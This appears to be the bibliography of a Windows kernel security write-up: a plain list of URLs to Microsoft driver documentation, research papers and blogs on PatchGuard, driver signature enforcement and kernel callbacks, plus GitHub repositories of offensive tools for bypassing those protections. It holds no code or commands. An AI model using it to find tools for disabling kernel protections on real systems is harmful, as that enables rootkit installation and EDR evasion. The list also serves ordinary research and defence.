- https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
- https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-list_entry
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
- https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
- https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea
- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messagebox
- https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowshookexa
- https://docs.microsoft.com/en-us/windows/win32/etw/about-event-tracing
- https://docs.microsoft.com/en-us/windows/win32/procthread/isolated-user-mode--ium--processes
- https://docs.microsoft.com/en-us/windows/wsl/faq
- https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-device-guard
- https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/aux_klib/nf-aux_klib-auxklibquerymoduleinformation
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-psremovecreatethreadnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-psremoveloadimagenotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutineex2
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreatethreadnotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetloadimagenotifyroutine
- https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-pslookupprocessbyprocessid
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugging-using-windbg-preview
- https://docs.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program
- https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/callback-objects
- https://docs.microsoft.com/en-us/windows-hardware/test/hlk/testref/driver-compatibility-with-device-guard
- https://docs.microsoft.com/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature
- https://docs.microsoft.com/en-us/windows-hardware/drivers/install/kernel-mode-code-signing-policy--windows-vista-and-later-
- https://docs.microsoft.com/en-gb/windows-hardware/drivers/dashboard/get-a-code-signing-certificate
- https://docs.microsoft.com/en-gb/windows-hardware/drivers/dashboard/register-for-the-hardware-program
- https://en.wikipedia.org/wiki/DoublePulsar
- https://en.wikipedia.org/wiki/Endpoint_Detection_and_Response
- https://en.wikipedia.org/wiki/Fatal_system_error
- https://en.wikipedia.org/wiki/Hooking
- https://en.wikipedia.org/wiki/Hyper-V
- https://en.wikipedia.org/wiki/Intel_Management_Engine
- https://en.wikipedia.org/wiki/Kernel_Patch_Protection
- https://en.wikipedia.org/wiki/List_of_IOMMU-supporting_hardware
- https://en.wikipedia.org/wiki/Rootkit
- https://en.wikipedia.org/wiki/Stuxnet
- https://en.wikipedia.org/wiki/System_Service_Descriptor_Table
- https://en.wikipedia.org/wiki/Windows_Defender
- https://en.wikipedia.org/wiki/Windows_Vista
- https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://j00ru.vexillium.org/2012/11/defeating-windows-driver-signature-enforcement-part-1-default-drivers/
- https://github.com/9176324/Shark
- https://github.com/can1357/ByePg
- https://github.com/comaeio/SwishDbgExt
- https://github.com/everdox/InfinityHook
- https://github.com/fdiskyou/injectAllTheThings
- https://github.com/fdiskyou/threat-INTel/blob/master/2015/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf
- https://github.com/fdiskyou/wdk-header-files/blob/master/win10rs5/ntddk.h
- https://github.com/fdiskyou/windows-ps-callbacks-experiments
- https://github.com/hfiref0x/DSEFix
- https://github.com/hfiref0x/KDU
- https://github.com/hfiref0x/KDU/tree/master/Source/Examples/BadRkDemo
- https://github.com/hfiref0x/Stryker
- https://github.com/hfiref0x/TDL
- https://github.com/hfiref0x/UPGDSED
- https://github.com/killvxk/DisableWin10PatchguardPoc
- https://github.com/Mattiwatti/EfiGuard
- https://github.com/niemand-sec/AntiCheat-Testing-Framework
- https://github.com/seporaitis/xv6-public/wiki/CPU-Registers-CR0
- https://github.com/stephenfewer/ReflectiveDLLInjection
- https://github.com/tandasat/findpg
- https://github.com/tandasat/PgResarch
- https://github.com/zerosum0x0/puppetstrings
- https://github.com/zhuhuibeishadiao/PatchGuardResearch
- http://codemachine.com/article_kernel_callback_functions.html
- http://deniable.org/misc/inject-all-the-things
- http://standa-note.blogspot.com/2014/11/debugging-early-boot-stages-of-windows.html
- http://standa-note.blogspot.com/2015/01/a-lst-of-patchguard-v81-related.html
- http://standa-note.blogspot.com/2015/08/writing-hypervisor-for-kernel-mode-code.html
- http://standa-note.blogspot.com/2015/10/some-tips-to-analyze-patchguard.html
- http://www.capstone-engine.org/
- https://zydis.re/
- http://www.nosuchcon.org/talks/2014/D2_01_Andrea_Allievi_Win8.1_Patch_protections.pdf
- http://www.powerofcommunity.net/poc2012/mj0011.pdf
- http://www.sekoia.fr/blog/windows-driver-signing-bypass-by-derusbi/
- http://www.uninformed.org/?v=3&a=3
- http://www.uninformed.org/?v=6&a=1&t=sumry
- http://www.uninformed.org/?v=all&a=38&t=sumry
- http://uninformed.org/index.cgi?v=8&a=5
- https://blog.ensilo.com/windows-pssetloadimagenotifyroutine-callbacks-the-good-the-bad-and-the-unclear-part-1
- https://blog.ensilo.com/windows-pssetloadimagenotifyroutine-callbacks-the-good-the-bad-and-the-unclear-part-2
- https://blog.talosintelligence.com/2014/08/the-windows-81-kernel-patch-protection.html
- https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.00.pdf
- https://blog.tetrane.com/downloads/Tetrane_PatchGuard_Analysis_RS4_v1.01.pdf
- https://code.google.com/archive/p/bypass-x64-dse/downloads
- https://csrc.nist.gov/CSRC/media/projects/cryptographic-module-validation-program/documents/security-policies/140sp1327.pdf
- https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
- https://forum.avast.com/index.php?topic=162445.60
- https://githomelab.ru/pykd/pykd
- https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf
- http://media.blackhat.com/bh-us-12/Briefings/Cerrudo/BH_US_12_Cerrudo_Windows_Kernel_WP.pdf
- https://leanpub.com/windowskernelprogramming
- https://medium.com/yarden-shafir/yes-more-callbacks-the-kernel-extension-mechanism-c7300119a37a
- https://os.kaspersky.com/products/kaspersky-secure-hypervisor/
- https://processhacker.sourceforge.io/
- https://securelist.com/elevation-of-privileges-in-namco-driver/83707/
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html
- https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtCreateThread.html
- https://visualstudio.microsoft.com/vs/
- https://web.archive.org/web/20130413005705/http://www.saferbytes.it/2012/09/18/uefi-technology-say-hello-to-the-windows-8-bootkit/
- https://web.archive.org/web/20160417224229/http://www.vrtulex.net/download/ostatni/prirucky/kernel-data-filtering.pdf
- https://www.360totalsecurity.com/en/
- https://www.amazon.co.uk/Windows-Internals-Part-architecture-management/dp/0735684189/
- https://www.avast.com/en-gb/technology/malware-detection-and-blocking
- https://www.bitdefender.com/business/enterprise-products/hypervisor-introspection.html
- https://www.codemachine.com/article_kernel_callback_functions.html
- https://www.codeproject.com/Articles/28318/Bypassing-PatchGuard-3
- https://www.felixcloutier.com/x86/lea
- https://www.gaijin.at/en/infos/windows-version-numbers
- https://www.geoffchappell.com/studies/windows/km/ntoskrnl/structs/eprocess/index.htm
- http://www.geoffchappell.com/notes/security/whqlsettings/index.htm
- https://www.microsoft.com/
- https://www.osronline.com/article.cfm%5Earticle=157.htm
- https://www.pcgamesn.com/street-fighter-v/sfv-capcom-rootkit-security
- https://www.secureauth.com/labs/advisories/gigabyte-drivers-elevation-privilege-vulnerabilities
- https://www.symantec.com/connect/blogs/reality-check-patchguard
- https://www.trendmicro.com/vinfo/pl/security/news/security-technology/windows-kernel-bug-found-can-be-abused-to-reportedly-bypass-security-systems
- https://www.triplefault.io/2017/09/enumerating-process-thread-and-image.html
- https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html
- https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html
- https://www.youtube.com/watch?v=85H4RvPGIX4
- https://christopher-vella.com/2019/09/06/recent-edr-av-observations/
- https://www.davidegrayson.com/signing/
- https://www.davidegrayson.com/signing/#kmod
- https://channel9.msdn.com/Events/Windows/Filter-Plugfest28/Driver-Certification-on-Windows-Client-and-Server
- http://www.nynaeve.net/?p=111
- http://fyyre.ru/vault/bootloader.txt
- http://fyyre.ru/vault/bootloader_v2.txt
- https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/Windows_81_Kernel_Patch_Protection_Analysis.pdf
- http://www.zer0mem.sk/?p=271
- https://web.archive.org/web/20140824075154/https://www.mcafee.com/us/resources/reports/rp-defeating-patchguard.pdf
- https://code.google.com/archive/p/easyhook-continuing-detours/wikis/PatchGuard.wiki